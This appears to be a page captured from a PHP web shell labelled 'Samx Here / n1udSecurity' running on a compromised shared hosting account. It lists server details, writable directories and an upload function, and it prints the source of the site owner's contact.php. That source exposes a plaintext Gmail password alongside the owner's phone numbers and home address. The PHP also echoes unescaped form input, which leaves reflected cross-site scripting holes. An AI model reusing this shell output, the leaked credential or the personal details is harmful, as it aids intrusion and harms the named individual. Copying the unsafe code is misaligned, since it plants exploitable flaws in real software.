Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/matthieu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/matthieu/contact.php
<? 
if ( isset ( $_POST['de1'] ) &&  isset ( $_POST['de2'] ) && isset ( $_POST['message'] ) && ( $_POST['message'] != "" ) && ( $_POST['de1'] != "" ) && ( $_POST['de2'] != "" ))
	{
	include_once ( "./classes/class.phpmailer.php" );

	$mails = new PHPMailer();
        include('./classes/language/phpmailer.lang-fr.php');
        $mails->language = $PHPMAILER_LANG;//	

	$mails->Mailer  = 'qmail';

	$mails->AddAddress("contact@liberlogic.fr", "Matthieu GIROUX");
	$mails->Body = $_POST['message']; 
	$mails->Username = 'girouxmatthieu@gmail.com'; 
	$mails->Password = '1975lazare16'; 
	$mails->Host = 'localhost'; 
//	$mails->Host = 'smtp.gmail.com'; 
	$mails->Port = 587; 
	$mails->SMTPSecure = 'ssl'; 
	$mails->SMTPAuth = true;
	$mails->Subject = $_POST['sujet'];
	$mails->From = $_POST['de1']."@".$_POST['de2'];
	$mails->FromName = $_POST['nom']." ".$_POST['prenom'];

	$format = "txt";
	if ( $mails->Send())
		{
		echo ( '<html><head><META http-equiv="refresh" content="1; URL=contact.php?envoye='.$_POST['sujet'].'"></head></html>'); 
		exit;
		}
	   else
		{
		$txt_envoi = "<b>Erreur</b> dans l'envoi du mail :".$mails->ErrorInfo."<br>Sujet : ".$_POST['sujet']."<br>Message : ".$_POST['message']."<br>";
		}
	}

?>
<HTML>
<HEAD>
<TITLE>Contacter Matthieu Giroux</TITLE>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
<META NAME="Author" CONTENT="Matthieu Giroux">
<META NAME="Generator" CONTENT="NetObjects Fusion 4.0 pour Windows">
<meta name="Description" content="Voici pour vous des contes, poèmes et sketchs. Vous pourrez aussi découvrir les effets numérique et de la hdtv...">
<meta name="Keywords" content="matthieu,giroux,françoise,girou,conte,contes,histoire,histoires,expose,science,video,dvd,hdtv,fiction,delphi,x,delphix,brique,casse,multi,borland,inprise,fx,matrix,poèmes,poète,ftp,téléchargement,download,jeu,jeux,fictions,document,programmes,sources,personnel,libre,exemple,quatre,source,poemes,poeme,dauphin,scène,scene,développeur,cnam,informatique,emploi,site,personnel,poète,jeu,delphix,CV,DX,DLL,ISAPI,java,games,pascal,objet,animateur,poèmes,programmer,programmez,chef,projet,DEST,bac,quatre,exposé">
<meta name="Robots" content="follow,index,all">
<meta name="REVISIT-AFTER" content="30 days">
<meta NAME="author" CONTENT="Matthieu Giroux">
<meta name="language" content="Français">
<META HTTP-EQUIV="Expires" CONTENT="0">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<LINK REL=STYLESHEET TYPE="text/css" HREF="./style.css">
</head>
<body>
<table>
<tr><td valign="top">
<!-- --><script>
if (document.layers)
{
document.write('<LAYER NAME="ARBRE" src="../i/arbre.html" TOP=210 WIDTH="200" HEIGHT="2000"></LAYER>');
}
else
{
document.write('<IFRAME style="position:relative;" SRC="../i/arbre.html" NAME="ARBRE" SCROLLING="AUTO" WIDTH="200" HEIGHT="2000" MARGINWIDTH=0 MARGINHEIGHT=0 FRAMEBORDER="No"></IFRAME>');
}
</script>
</td>
<td valign="top">
<IMG SRC="./images/2008-10_icone_user.gif" ALT="Contacter" /><h1>Matthieu GIROUX - Auteur informaticien</h1>
<br>
<b>
02 23 46 06 54 - 06 16 16 14 74<br><br>
13 Rue Tanguy PRIGENT<br>
35000 RENNES</b><br><br>
<form name="form1" method="post" action="contact.php">
<? 
if ( isset ( $_GET['envoye'] ))
	{
	echo "<b>Merci</b> d'avoir envoy&eacute; le mail avec le sujet suivant : <br>".$_GET['envoye']."<br>" ;
	}
if ( isset ($txt_envoi ))
	{
	echo $txt_envoi ;
	}
?>
<table border="0">
<tr>
<td>Nom : </td>
<td><input name="nom" type="text" id="nom" value="<? echo $_POST['nom'];?>"><font> Pr&eacute;nom : </font><input name="prenom" type="text" id="prenom" value="<? echo $_POST['prenom'];?>">
</td>
</tr>
<tr>
<td>De : </td>
<td><input name="de1" type="text" id="de1" value="<? echo $_POST['de1'];?>">@<input name="de2" type="text" id="de2" value="<? echo $_POST['de2'];?>">
</td>
</tr>
<tr>
<td> Sujet du message : </td>
<td><input name="sujet" type="text" id="sujet2" size="95" value="<? echo $_POST['sujet'];?>"></td>
</tr>
<tr>
<td>Message : </td>
<td><textarea name="message" cols="90" rows="5"><? echo $_POST['message'];?></textarea></td> </tr>
<tr>
<td>&nbsp;</td>
<td><input type="submit" name="Submit" value="Envoyer">
<input type="reset" name="Submit2" value="R&eacute;tablir">
</td>
</tr>
</table>
<p>&nbsp; </p>
</form>
</b><br>
<P>
ELAN CREATEUR<BR>
SIRET 437 827 959 00010 APE 741G
</p>
<script>
if (document.layers)
{
document.write('<LAYER NAME="ARBRE" src="./footer_matthieu.html" TOP=210 WIDTH="2000" HEIGHT="25"></LAYER>');
}
else
{
document.write('<IFRAME style="position:relative;" SRC="./footer_matthieu.html" NAME="ARBRE" SCROLLING="AUTO" WIDTH="2000" HEIGHT="25" MARGINWIDTH=0 MARGINHEIGHT=0 FRAMEBORDER="No"></IFRAME>');
}
</script>

</td>
</tr>
</table>
</body>
</html>


SAMX